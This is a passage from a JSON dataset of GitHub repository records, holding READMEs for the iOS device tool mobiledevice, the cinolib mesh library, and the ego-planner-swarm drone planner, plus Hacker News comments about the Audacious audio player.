jailbroken device required!\n\n## Requirements\n\n* An iPhone 3G or later, or an iPad (verified with iPhone 4, 5 and 6).\n* Connect the iPhone or iPad to the Mac via USB.\n* To install apps, install an iOS development certificate on the device beforehand.\n* Mac OS X 10.6 or later.\n* Install XCode 3 or later and the iOS SDK.\n* Compile this tool (installing it is optional).\n\n### Install\n\n### Homebrew\n\nWhen using [homebrew](http://brew.sh), open a terminal and run the following commands:\n\n```shell\nbrew update\nbrew install mobiledevice\n```\n\n### 
Manual\n\nTo compile mobiledevice, open a terminal and run the following commands:\n\n```shell\ngit clone git://github.com/imkira/mobiledevice.git\ncd mobiledevice\nmake\n```\n\nTo install it, also run the following command:\n\n```shell\nmake install\n```\n\n## Usage\n\n### Help\n\nAfter compiling and (optionally) installing, open a terminal.\n\nIf you run mobiledevice as follows,\n\n```shell\nmobiledevice help\n```\n\nyou will see the basic usage help screen shown below (English only).\n\n```\nmobiledevice help\n Display this help screen\n\nmobiledevice version [options]\n Display program version.\n Options:\n -r: Include revision identifier\n\nmobiledevice list_devices [options]\n Display the UDID of each connected device.\n Options:\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n -n <count>: Limit the number of devices to be printed\n\nmobiledevice list_device_props [options]\n List all property names of device.\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice get_device_prop [options] <property_name>\n Display value of device property with given name.\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice list_apps [options]\n List all apps installed on device\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice list_app_props [options] <app_id>\n List all property names of app with given bundle id.\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice get_app_prop [options] <app_id> <property_name>\n Display value of app property with given name.\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice install_app [options] <path_to_app>\n Install app (.app folder) to device\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice uninstall_app [options] <app_id>\n Uninstall app with given bundle id from device\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice tunnel [options] <local_port> <device_port>\n Forward TCP connections to connected device\n Options:\n -u <udid>: Filter by device UDID (default: first detected device)\n -t <timeout>: Timeout (in ms) to wait for devices (default: 1)\n\nmobiledevice get_bundle_id <path_to_app>\n Display bundle identifier of app (.app folder)\n```\n\n
If any of the above commands fails, the process always terminates with a non-zero exit status.\nDepending on the error that occurred, details may also be printed to stderr.\n\nIf a command succeeds, the process always terminates with exit status 0.\n\n
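Because success and failure are reported through the exit status, mobiledevice is easy to drive from other programs. The following is a minimal illustrative sketch (not part of mobiledevice) that shells out to the tool from C++ and checks the result; the bundle identifier is a placeholder:

```c++
// Sketch: driving mobiledevice from C++ via its exit status.
// Assumes mobiledevice is on PATH; com.mycompany.myapp is a placeholder.
#include <cstdlib>
#include <iostream>
#include <sys/wait.h> // WEXITSTATUS (the tool is macOS-only anyway)

int main()
{
    int raw = std::system("mobiledevice uninstall_app com.mycompany.myapp");
    int status = (raw == -1) ? -1 : WEXITSTATUS(raw);
    if(status == 0) std::cout << "uninstall succeeded\n";
    else            std::cerr << "uninstall failed (exit status " << status << ")\n";
    return status == 0 ? 0 : 1;
}
```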
### List connected devices\n\nTo print the list of connected devices, run:\n\n```\nmobiledevice list_devices\n```\n\nThe output looks like this:\n\n```\naaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d\n7c211433f02071597741e6ff5a8ea34789abbf43\n0ab8318acaf6e678dd02e2b5c343ed41111b393d\n```\n\nThe list above shows that three devices are connected.\nTo limit how many devices are listed, use the ```-n <count>``` flag:\n\n```\nmobiledevice list_devices -n 1\n```\n\nThe output looks like this:\n\n```\naaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d\n```\n\n### List device property names\n\nTo print the list of a device's property names, run:\n\n```\nmobiledevice list_device_props\n```\n\nThe output looks like this:\n\n```\nActivationPublicKey\nActivationState\nActivationStateAcknowledged\nBasebandSerialNumber\nBasebandStatus\nBasebandVersion\nBluetoothAddress\nBuildVersion\nCPUArchitecture\nDeviceCertificate\nDeviceClass\nDeviceColor\nDeviceName\nDevicePublicKey\nDieID\n...\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice list_device_props -u 7c211433f02071597741e6ff5a8ea34789abbf43\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n\n### Get the value of a device property\n\nTo print the value of a device property, run:\n\n```\nmobiledevice get_device_prop <property_name>\n```\n\nFor example, to get the device's product type, specify the ```ProductType``` property name:\n\n```\nmobiledevice get_device_prop ProductType\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice get_device_prop -u 7c211433f02071597741e6ff5a8ea34789abbf43 <property_name>\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n* On success, the value is printed followed by a newline character.\n\n### List installed apps\n\nTo print the list of apps installed on the device, run:\n\n```\nmobiledevice list_apps\n```\n\nThe output looks like this:\n\n```\ncom.apple.VoiceMemos\ncom.apple.mobiletimer\ncom.apple.AdSheetPhone\ncom.apple.weather\ncom.apple.iphoneos.iPodOut\ncom.apple.mobilesafari\ncom.apple.Preferences\n...\ncom.mycompany.myapp1\ncom.mycompany.myapp2\n...\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice list_apps -u 7c211433f02071597741e6ff5a8ea34789abbf43\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n\n### List app property names\n\nTo print the list of property names of an app installed on the device, specify the app's bundle identifier and run:\n\n```\nmobiledevice list_app_props com.mycompany.myapp\n```\n\nThe output looks like this:\n\n```\nSBIconClass\nCFBundleInfoDictionaryVersion\nEntitlements\nDTPlatformVersion\nCFBundleName\nDTSDKName\nApplicationType\nUIViewControllerBasedStatusBarAppearance\nCFBundleIcons\nUIStatusBarStyle\nContainer\nLSRequiresIPhoneOS\nCFBundleDisplayName\nPrivateURLSchemes\nUIBackgroundModes\nDTSDKBuild\n...\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice list_app_props -u 7c211433f02071597741e6ff5a8ea34789abbf43\n```\n\nNotes:\n\n* 
If the ```-u <udid>``` flag is not specified, the first detected device is used.\n\n### Get the value of an app property\n\nTo print the value of a property of an app installed on the device, specify the app's bundle identifier and the property name:\n\n```\nmobiledevice get_app_prop com.mycompany.myapp <property_name>\n```\n\nFor example, to get the path at which Apple's Weather app is installed on the device, specify the ```Path``` property name:\n\n```\nmobiledevice get_app_prop com.apple.weather Path\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice get_app_prop -u 7c211433f02071597741e6ff5a8ea34789abbf43 com.mycompany.myapp Path\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n* On success, the value is printed followed by a newline character.\n\n### Install an app\n\nTo install an app on the device, run the following command:\n\n```\nmobiledevice install_app path/to/my_application.app\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice install_app -u 7c211433f02071597741e6ff5a8ea34789abbf43 path/to/my_application.app\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n\n### Uninstall an app\n\nTo uninstall an app from the device, specify its bundle identifier and run the following command:\n\n```\nmobiledevice uninstall_app com.mycompany.myapp\n```\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice uninstall_app -u 7c211433f02071597741e6ff5a8ea34789abbf43 
com.mycompany.myapp\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n\n### Establish a TCP tunnel from a local Mac port to a device port\n\nIf, for whatever reason, your app runs a TCP server on some TCP port, this command makes it reachable from the Mac over USB, even without WiFi/3G.\nmobiledevice establishes a tunnel between the Mac and the device over USB, so that connecting (with telnet, for example) to the chosen TCP port on the Mac (localhost or 127.0.0.1) connects you to the chosen port on the device.\n\n```\nmobiledevice tunnel 8080 80\n```\n\nThe example above establishes a tunnel between TCP port 8080 on the Mac and TCP port 80 on the device.\nThe command's output looks like this:\n\n```\nTunneling from local port 8080 to device port 80...\n```\n\nOnce this message appears, you can reach TCP port 80 on the device from the Mac, e.g. with `telnet localhost 8080`!\n\nTo target a specific device, add the ```-u <udid>``` flag:\n\n```\nmobiledevice tunnel -u 7c211433f02071597741e6ff5a8ea34789abbf43 8080 80\n```\n\nNotes:\n\n* If the ```-u <udid>``` flag is not specified, the first detected device is used.\n* To be able to terminate the process (and with it the tunnel) easily with CTRL-C, do not run the process in the background while the tunnel is in use.\n* Terminating the process (e.g. with CTRL-C) while the tunnel is in use interrupts the connections.\n* A single tunnel can serve multiple simultaneous connections. However, you cannot open two or more tunnels on the same local port.\n\n
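To show what talking to the device through the tunnel looks like programmatically, here is a small illustrative C++ sketch (not part of mobiledevice) that connects to the Mac-side end of the tunnel with plain POSIX sockets; port 8080 matches the example above:

```c++
// Sketch: connect to the Mac-side end of a mobiledevice tunnel
// (here 127.0.0.1:8080, as in the example above) with POSIX sockets.
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
#include <cstdio>

int main()
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if(fd < 0) { perror("socket"); return 1; }

    sockaddr_in addr{};
    addr.sin_family = AF_INET;
    addr.sin_port   = htons(8080); // local end of the tunnel
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);

    if(connect(fd, reinterpret_cast<sockaddr*>(&addr), sizeof(addr)) < 0)
    {
        perror("connect"); // e.g. tunnel not running
        close(fd);
        return 1;
    }

    // Everything written here comes out of the device-side port (80 above).
    const char msg[] = "hello from the Mac\n";
    write(fd, msg, sizeof(msg) - 1);

    char buf[256];
    ssize_t n = read(fd, buf, sizeof(buf) - 1);
    if(n > 0) { buf[n] = '\0'; std::printf("device replied: %s", buf); }

    close(fd);
    return 0;
}
```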
### Get the bundle identifier of a .app folder\n\nThis command has nothing to do with the Mobile Device framework, but is provided as a handy extra.\nTo get an app's bundle identifier (e.g. com.mycompany.myapp) from a given .app folder, run the command below (note: .ipa files are not supported).\n\n```\nmobiledevice get_bundle_id folder1/folder2/example.app\n```\n\nNotes:\n\n* The path is a local path on your computer, not a path on the device.\n\n## \"I want to contribute!\"\n\nIf you have found a bug, or have built some awesome feature you would like to add to mobiledevice, please fork the project and send a pull request!\n\n### Contributors\n\n[List](https://github.com/imkira/mobiledevice/graphs/contributors).\n\n## License\n\nmobiledevice is released under the MIT License:\n\nwww.opensource.org/licenses/MIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mlivesu/cinolib", "link": "https://github.com/mlivesu/cinolib", "tags": ["geometry-processing", "computer-graphics", "polygonal-meshes", "polyhedral-meshes", "triangle-mesh", "quad-mesh", "quadrilateral-mesh", "tetrahedral-mesh", "tet-mesh", "hexahedral-mesh", "hex-mesh", "hexmesh", "tetmesh", "quadmesh", "trimesh", "mesh-generation", "mesh-processing", "surface-mesh", "volume-mesh", "geodesic"], "stars": 640, "description": "A generic programming header only C++ library for processing polygonal and polyhedral meshes", "lang": "C++", "repo_lang": "", "readme": "# CinoLib\n![MacOS](https://github.com/mlivesu/cinolib/actions/workflows/macos-build.yml/badge.svg?event=push)\n![Ubuntu](https://github.com/mlivesu/cinolib/actions/workflows/ubuntu-build.yml/badge.svg?event=push)\n![Windows](https://github.com/mlivesu/cinolib/actions/workflows/windows-build.yml/badge.svg?event=push)\n\nCinoLib is a C++ library for processing polygonal and polyhedral meshes. It supports surface meshes made of triangles, quads or general polygons, as well as volumetric meshes made of tetrahedra, hexahedra or general polyhedra. \n\nA distinctive feature of the library is that all supported meshes inherit from a unique base class that implements their common traits, making it possible to deploy algorithms that operate on _abstract_ meshes that may be any of the above. This allows an algorithm to be implemented just once and run on any possible mesh, thus avoiding code duplication and reducing the debugging effort.\n\n
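To make the "write it once, run it on any mesh" idea concrete, here is a short illustrative sketch (not taken from the library's docs; accessor names such as `num_verts()` and `vert()` are assumed from cinolib's generic mesh interface, and `bunny.mesh` is a hypothetical input file):

```c++
// Sketch: one generic function that works on any cinolib mesh type,
// surface or volumetric, thanks to the shared base class.
#include <cinolib/meshes/meshes.h>
#include <iostream>

template<class Mesh>
cinolib::vec3d centroid(const Mesh & m)
{
    cinolib::vec3d c(0,0,0);
    for(unsigned int vid = 0; vid < m.num_verts(); ++vid) c += m.vert(vid);
    return c / static_cast<double>(m.num_verts());
}

int main()
{
    cinolib::Trimesh<> tri("bunny.obj");  // surface mesh
    cinolib::Tetmesh<> tet("bunny.mesh"); // volumetric mesh (hypothetical file)
    std::cout << "trimesh centroid: " << centroid(tri) << std::endl;
    std::cout << "tetmesh centroid: " << centroid(tet) << std::endl;
    return 0;
}
```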
\n\n## Positioning\nGitHub hosts a whole variety of great academic libraries for mesh processing. If you do mainly geometry processing on triangle meshes, then tools like [libigl](https://libigl.github.io), [GeometryCentral](https://geometry-central.net) or [VCG](https://github.com/cnr-isti-vclab/vcglib) may be what you want. If you are interested in rendering, [Yocto/GL](https://github.com/xelatihy/yocto-gl) is extremely fast and implements many relevant algorithms. [OpenMesh](https://www.graphics.rwth-aachen.de/software/openmesh/) and [PMP](http://www.pmp-library.org) have a slightly broader scope and can handle general polygonal surfaces. For volumes, tiny portions of [libigl](https://libigl.github.io) and [GeometryCentral](https://geometry-central.net) offer rudimentary support for specific solid elements such as tetrahedra or hexahedra, but most of each library is focused on surfaces. Conversely, [OpenVolumeMesh](https://www.graphics.rwth-aachen.de/software/openvolumemesh/) is entirely focused on volumes and can operate on general polyhedral elements, but it does not support surface meshes. To the best of my knowledge, only [Geogram](https://github.com/BrunoLevy/geogram) has a unified data structure that can host both surface and volume elements, but it only supports hexahedra, tetrahedra, prisms and pyramids as volume cells. Unlike all these alternatives, CinoLib has a unique data structure that is designed to host any type of surface and volumetric element. If this comes in handy to you, I am not aware of any existing alternative. Note that CinoLib trades generality for efficiency, hence all this flexibility comes at a cost. Many optimizations that are possible when one operates on a restricted set of mesh elements cannot be applied here, especially memory-wise, where generic elements with an unpredictable number of vertices, edges and faces demand the use of dynamic allocators. For this reason, in some cases CinoLib may be slightly less efficient than the aforementioned alternatives.\n\n\n## Getting started\nCinoLib is header only. It does not need to be installed; all you have to do is clone the repo with\n```\ngit clone https://github.com/mlivesu/cinolib.git\n```\nand include in your C++ application the header files you need. For small projects this can be done simply by instructing the compiler on where to find the library sources, e.g. with the `-I` option. For more convoluted projects it is suggested to rely on a build system such as [CMake](https://cmake.org), which can also handle optional external dependencies and compilation flags or symbols.\n\n## Build a sample project (with CMake)\nHere is an example of a toy program that reads a triangle mesh and displays it in a window\n```c++\n#include <cinolib/meshes/meshes.h>\n#include <cinolib/gl/glcanvas.h>\n\nint main()\n{\n using namespace cinolib;\n DrawableTrimesh<> m(\"bunny.obj\");\n GLcanvas gui;\n gui.push(&m);\n return gui.launch();\n}\n```\nand this is the `CMakeLists.txt` that can be used to compile it\n```cmake\ncmake_minimum_required(VERSION 3.2)\nproject(cinolib_demo)\nadd_executable(${PROJECT_NAME} main.cpp)\nset(CINOLIB_USES_OPENGL_GLFW_IMGUI ON)\nfind_package(cinolib REQUIRED)\ntarget_link_libraries(${PROJECT_NAME} cinolib)\n```\nCompiling should be as easy as opening a terminal in the folder containing the two files above and typing\n```\nmkdir build\ncd build\ncmake .. 
-DCMAKE_BUILD_TYPE=Release -Dcinolib_DIR=<path-to-cinolib>\nmake\n```\nNote that for the rendering part CinoLib uses [GLFW](https://www.glfw.org), which will be automatically installed and linked by the script `cinolib-config.cmake`, contained in the main directory of the library. The same script can automatically download and install any other external dependency, meaning that if you want to access a functionality that depends on some external library `XXX`, all you have to do is set a CMake variable of the form `CINOLIB_USES_XXX` to `ON`. \nValid options are:\n* `CINOLIB_USES_OPENGL_GLFW_IMGUI`, used for rendering with OpenGL\n* `CINOLIB_USES_TRIANGLE`, used for polygon triangulation\n* `CINOLIB_USES_TETGEN`, used for tetrahedralization\n* `CINOLIB_USES_SHEWCHUK_PREDICATES`, used for exact geometric tests on input points\n* `CINOLIB_USES_INDIRECT_PREDICATES`, used for exact geometric tests on implicit points\n* `CINOLIB_USES_GRAPH_CUT`, used for graph clustering\n* `CINOLIB_USES_BOOST`, used for 2D polygon operations (e.g. thickening, clipping, 2D booleans...)\n* `CINOLIB_USES_VTK`, used just to support VTK file formats\n* `CINOLIB_USES_SPECTRA`, used for matrix eigendecomposition\n\n## GUI\nCinoLib is designed for researchers in computer graphics and geometry processing who need to quickly realize software prototypes that demonstrate a novel algorithm or technique. In this context a simple OpenGL window and a side bar containing a few buttons and sliders are often more than enough. The library uses [ImGui](https://github.com/ocornut/imgui) for the GUI and [GLFW](https://www.glfw.org) for OpenGL rendering. Typical visual controls for the rendering of a mesh (e.g. shading, wireframe, texturing, planar slicing, etc.) are all encoded in two classes `cinolib::SurfaceMeshControls` and `cinolib::VolumeMeshControls`, which operate on surface and volume meshes respectively. To add a side bar that displays all such controls one can modify the sample program above as follows:\n```c++\n#include <cinolib/meshes/meshes.h>\n#include <cinolib/gl/glcanvas.h>\n#include <cinolib/gl/surface_mesh_controls.h>\n\nint main()\n{\n using namespace cinolib;\n DrawableTrimesh<> m(\"bunny.obj\");\n GLcanvas gui;\n SurfaceMeshControls<DrawableTrimesh<>> mesh_controls(&m, &gui);\n gui.push(&m);\n gui.push(&mesh_controls);\n return gui.launch();\n}\n```\nThe canvas can host multiple mesh controls, ideally one for each mesh in the scene. Additional GUI elements that may be necessary to control the application (e.g. the parameters of your algorithm) can be added by implementing a dedicated callback:\n```c++\n#include <cinolib/meshes/meshes.h>\n#include <cinolib/gl/glcanvas.h>\n#include <cinolib/gl/surface_mesh_controls.h>\n\nint main()\n{\n using namespace cinolib;\n DrawableTrimesh<> m(\"bunny.obj\");\n GLcanvas gui;\n SurfaceMeshControls<DrawableTrimesh<>> mesh_controls(&m, &gui);\n gui.push(&m);\n gui.push(&mesh_controls);\n float val = 1.0, min = 0.0, max = 10.0;\n gui.callback_app_controls = [&]()\n {\n if(ImGui::Button(\"MyButton\"))\n {\n // button clicked: do something\n }\n if(ImGui::SliderFloat(\"MySlider\", &val, min, max))\n {\n // slider moved: do something\n } \n };\n return gui.launch();\n}\n```\n
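Event handling works the same way: the canvas exposes the event callbacks listed right below. As a purely illustrative sketch (assuming these are assignable `std::function` members matching the listed signatures; check the `GLcanvas` header for the exact types and return values), key presses could be hooked like this:

```c++
#include <cinolib/meshes/meshes.h>
#include <cinolib/gl/glcanvas.h>
#include <iostream>

int main()
{
    using namespace cinolib;
    DrawableTrimesh<> m("bunny.obj");
    GLcanvas gui;
    gui.push(&m);
    // assumption: signature as listed below; a bool return (if expected by
    // the canvas) would tell it whether the event was consumed
    gui.callback_key_pressed = [&](int key, int modifiers) -> bool
    {
        std::cout << "key " << key << " pressed (modifiers: " << modifiers << ")" << std::endl;
        return false;
    };
    return gui.launch();
}
```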
The full list of callbacks exposed by `GLcanvas` to interact with user events (e.g. for scene navigation, mouse picking, etc.) is:\n* `callback_key_pressed(int key, int modifiers)`\n* `callback_mouse_left_click(int modifiers)`\n* `callback_mouse_left_click2(int modifiers)` => double click\n* `callback_mouse_right_click(int modifiers)` \n* `callback_mouse_right_click2(int modifiers)` => double click\n* `callback_mouse_moved(double x_pos, double y_pos)`\n* `callback_mouse_scroll(double x_offset, double y_offset)`\n* `callback_app_controls(void)`\n\n\n## Other examples\nA tutorial with detailed info on how to use the library is under development. In the meanwhile, you can explore the [**examples**](https://github.com/mlivesu/cinolib/tree/master/examples#examples) folder, which contains a constantly growing number of sample projects that showcase the core features of the library, and will be the backbone of the forthcoming tutorial.\n\n## Contributors\nMarco Livesu is the creator and lead developer of the library. Over the years various friends and colleagues have helped me to improve the codebase, either submitting code or helping me to spot and fix bugs. A big thanks goes to: Claudio Mancinelli (University of Genoa), Daniela Cabiddu (CNR IMATI), Chrystiano Ara\u00fajo (UBC), Thomas Alderighi (CNR ISTI), Fabrizio Corda (University of Cagliari), Gianmarco Cherchi (University of Cagliari) and Tommaso Sorgente (CNR IMATI)\n\n## Citing us\nIf you use CinoLib in your academic projects, please consider citing the library using the following \nBibTeX entry:\n\n```bibtex\n@article{cinolib,\n title = {cinolib: a generic programming header only C++ library for processing polygonal and polyhedral meshes},\n author = {Livesu, Marco},\n journal = {Transactions on Computational Science XXXIV},\n series = {Lecture Notes in Computer Science},\n editor = {Springer},\n note = {https://github.com/mlivesu/cinolib/},\n year = {2019},\n doi = {10.1007/978-3-662-59958-7_4}}\n```\n\n## Acknowledgment\nThe software collected in CinoLib spans a long period of time, starting from the beginning of my PhD to today. Since 2015, this work has been partly supported by various research projects, such as\n* [ProMED](http://arm.mi.imati.cnr.it/imati/detail_pages.php?language=ENG&view=GEN&voice_code=PRG&fcode=WHA&ref_idk=PJ-176)\n* [CHANGE](https://cordis.europa.eu/project/rcn/204834/en)\n* [CAxMan](https://cordis.europa.eu/project/id/680448)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "audacious-media-player/audacious", "link": "https://github.com/audacious-media-player/audacious", "tags": [], "stars": 639, "description": "A lightweight and versatile audio player", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "Kind of a tangent, but why switch from GTK to Qt 5? Or rather, why Qt 5 rather than some other cross platform UI framework or even GTK 3? Is it ease of porting it for new features compared to something else? And/or is Qt just that much nicer to use?Seems like the Qt5 front-end is just set as the default one, and the GTK front-end will be deprecated. There wasn't really any noticeable difference between both from the usability comparison in my opinion.Cross-platform toolkits are the lazy way. 
Good quality graphical apps are available in derivatives that match the interface guidelines and optimum toolkits/APIs of their platforms.Any screenshots?GTK integration in terms of look and feel on windows and macos has been so bad for so long that I think the only valid use case for it is if you're targeting gnome specifically.Audacious is pretty slick (especially with this latest release), but lacks the features that foobar2000 has that I need (namely, a directory/folder view that can replace the active playlist when clicked).If anyone is looking for a decent foobar2000 alternative, Foobnix (https://github.com/foobnix/foobnix) has worked really well for me. It has some rough edges and doesn't seem (that) actively maintained, but it gets the important stuff right. Haven't come across anything else quite like it for Linux yet, unfortunately.If there was a foobar-like folder view plugin for Audacious, I'd switch to it in a heartbeat.I always appreciate the perseverance and dedication of FOSS developers and teams. They bring a lot to the table for a whole lot of people.But something about the fonts and the UI layout always puts me off (primarily) Linux targeted (or developed) applications. Even Windows 10 doesn\u2019t use good fonts, IMO. I don\u2019t know why developers can\u2019t use good native fonts or bundle some good free fonts with the application, while also having better laid out UIs. We live in the age of 4K monitors (though most people are still on 1080p or lower) and smartphones with pretty good screens that many users are used to, and yet we have applications that look like they were developed two decades ago. Even large efforts like LibreOffice aren\u2019t immune to these deficiencies. I\u2019m not arguing for form over function, but definitely see a need for getting more UI designers into FOSS (I\u2019m not one, so my contributions are limited to monetary donations to projects I like or use).To reiterate, this is not to put down the humongous efforts (which many a times remain thankless or not adequate for putting food on the table) of FOSS developers.just posting to say thank u and share some love for audaciousLooks like this is moving from GTK2, not GTK3 ( latest ).Natural selection in action. \nIf you don't put enough effort for your framework to catch up modern language features and design principles, users would consider something else.It's alive!Which reminds me, foobar2000's Mac port seems to be chugging along\u2014though not open-source.Back in the day when I used desktop music players on linux I cycled through a whole bunch: Audacious, Rhythmbox, Banshee, Amarok, Songbird(Mozilla!), Moc(Oh, so minimal!), Cmus, mpd (server/client), and probably more that I'm forgetting now.Feel a touch nostalgic for the uncomplicated time when I had music on my devices, regularly \"organized my music library\" and could play whatever whenever, and shared them with friends. I can still rummage through my old disks and spin up some of that music from time to time.Mostly use cloud players these days; crazy to imagine that there's nothing I can do if my favorite song/recording today is not available ten years later!Title is misleading? 
This is just a bugfix release, QT planned for 4.0.edit: also, not the original title which reads 'Audacious 3.10 released'.> code-named \"Not Quite There Yet\"", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ZJU-FAST-Lab/ego-planner-swarm", "link": "https://github.com/ZJU-FAST-Lab/ego-planner-swarm", "tags": [], "stars": 639, "description": "An efficient single/multi-agent trajectory planner for multicopters.", "lang": "C++", "repo_lang": "", "readme": "# Quick Start within 3 Minutes \nCompilation tests passed on Ubuntu **16.04, 18.04, and 20.04** with ROS installed.\nYou can just execute the following commands one by one.\n```\nsudo apt-get install libarmadillo-dev\ngit clone https://github.com/ZJU-FAST-Lab/ego-planner-swarm.git\ncd ego-planner-swarm\ncatkin_make -j1\nsource devel/setup.bash\nroslaunch ego_planner simple_run.launch\n```\n\n\nIf you find this work useful or interesting, please kindly give us a star :star:, thanks!:grinning:\n\n# Acknowledgements\n\n- This work extends [EGO-Planner](https://github.com/ZJU-FAST-Lab/ego-planner) to swarm navigation.\n\n# EGO-Swarm\nEGO-Swarm: A Fully Autonomous and Decentralized Quadrotor Swarm System in Cluttered Environments\n\n**EGO-Swarm** is a decentralized and asynchronous systematic solution for multi-robot autonomous navigation in unknown obstacle-rich scenes using merely onboard resources.\n\n
\n\n**Video Links:** [YouTube](https://www.youtube.com/watch?v=K5WKg8meb94&ab_channel=FeiGao), [bilibili](https://www.bilibili.com/video/BV1Nt4y1e7KD) (for Mainland China)\n\n## 1. Related Paper\nEGO-Swarm: A Fully Autonomous and Decentralized Quadrotor Swarm System in Cluttered Environments, Xin Zhou, Jiangchao Zhu, Hongyu Zhou, Chao Xu, and Fei Gao (Published in ICRA2021). [Paper link](https://ieeexplore.ieee.org/abstract/document/9561902) and [Science](https://www.sciencemag.org/news/2020/12/watch-swarm-drones-fly-through-heavy-forest-while-staying-formation) report.\n\n## 2. Standard Compilation\n\n**Requirements**: Ubuntu 16.04, 18.04 or 20.04 with a ros-desktop-full installation.\n\n**Step 1**. Install [Armadillo](http://arma.sourceforge.net/), which is required by **uav_simulator**.\n```\nsudo apt-get install libarmadillo-dev\n``` \n\n**Step 2**. Clone the code from GitHub or Gitee. These two repositories synchronize automatically.\n\nFrom GitHub,\n```\ngit clone https://github.com/ZJU-FAST-Lab/ego-planner-swarm.git\n```\n\n\n\n**Step 3**. Compile,\n```\ncd ego-planner-swarm\ncatkin_make -DCMAKE_BUILD_TYPE=Release -j1\n```\n\n**Step 4**. Run.\n\nIn a terminal at the _ego-planner-swarm/_ folder, open rviz for visualization and interactions\n```\nsource devel/setup.bash\nroslaunch ego_planner rviz.launch\n```\n\nIn another terminal at the _ego-planner-swarm/_ folder, run the planner in simulation by\n```\nsource devel/setup.bash\nroslaunch ego_planner swarm.launch\n```\n\nThen you can follow the gif below to control the drone.\n\n
[GIF: controlling the drone in rviz]
\n\n## 3. Using an IDE\nWe recommend using [vscode](https://code.visualstudio.com/); the project files are included in the code you have cloned, in the _.vscode_ folder.\nThis folder is **hidden** by default.\nFollow the steps below to configure the IDE for auto code completion & jump.\nIt will take 3 minutes.\n\n**Step 1**. Install the C++ and CMake extensions in vscode.\n\n**Step 2**. Re-compile the code using the command\n```\ncatkin_make -DCMAKE_BUILD_TYPE=Release -DCMAKE_EXPORT_COMPILE_COMMANDS=Yes\n```\nIt will export a compile commands file, which can help vscode to determine the code architecture.\n\n**Step 3**. Launch vscode and select the _ego-planner-swarm_ folder to open.\n```\ncode ~/<......>/ego-planner-swarm/\n```\n\nPress **Ctrl+Shift+B** in vscode to compile the code. This command is defined in _.vscode/tasks.json_.\nYou can add customized arguments after **\"args\"**. The default is **\"-DCMAKE_BUILD_TYPE=Release\"**.\n\n**Step 4**. Close and re-launch vscode; you will see that vscode has understood the code architecture and can perform auto completion & jump.\n\n## 4. Use GPU or Not\nThe **local_sensing** package in this repo has two different versions: GPU and CPU. By default, the CPU version is used for better compatibility. By changing\n```\n set(ENABLE_CUDA false)\n```\nin the _CMakeLists.txt_ of the **local_sensing** package, to\n```\n set(ENABLE_CUDA true)\n```\nCUDA will be turned on to generate depth images as a real depth camera does. \n\nPlease remember to also change the 'arch' and 'code' flags in the line \n```\n set(CUDA_NVCC_FLAGS \n -gencode arch=compute_61,code=sm_61;\n ) \n``` \nin _CMakeLists.txt_ if you encounter compile errors due to the Nvidia graphics card you use. You can check the right code [here](https://github.com/tpruvot/ccminer/wiki/Compatibility).\n \nDon't forget to re-compile the code!\n\n**local_sensing** provides the simulated sensors. If ```ENABLE_CUDA``` is **true**, it mimics the depth measured by stereo cameras and renders a depth image on the GPU. If ```ENABLE_CUDA``` is **false**, it will publish point clouds with no ray-casting. Our local mapping module automatically selects depth images or point clouds as its input.\n\nFor installation of CUDA, please go to [CUDA Toolkit](https://developer.nvidia.com/cuda-toolkit)\n\n
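If you are unsure which 'arch' and 'code' values to use, the compute capability can be queried directly from the GPU. The following small sketch (not part of this repo) uses the CUDA runtime API and can be compiled with nvcc:

```c++
// Sketch: query each GPU's compute capability to pick the right
// -gencode arch=compute_XX,code=sm_XX flags. Compile with: nvcc query.cu
#include <cuda_runtime.h>
#include <cstdio>

int main()
{
    int n = 0;
    if(cudaGetDeviceCount(&n) != cudaSuccess || n == 0)
    {
        std::printf("no CUDA device found\n");
        return 1;
    }
    for(int i = 0; i < n; ++i)
    {
        cudaDeviceProp p;
        cudaGetDeviceProperties(&p, i);
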